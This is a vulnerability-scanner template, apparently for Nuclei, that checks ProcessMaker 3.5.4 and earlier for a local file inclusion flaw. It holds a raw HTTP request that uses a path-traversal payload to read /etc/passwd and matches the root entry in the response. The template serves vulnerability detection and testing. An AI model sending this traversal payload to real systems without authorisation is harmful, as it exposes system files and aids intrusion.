id: processmaker-lfi

info:
  name: ProcessMaker <=3.5.4 - Local File Inclusion
  author: KrE80r
  severity: high
  description: ProcessMaker 3.5.4 and prior is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/50229
    - https://www.processmaker.com
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: processmaker,lfi,edb

requests:
  - raw:
      - |
        GET /../../../..//etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/04
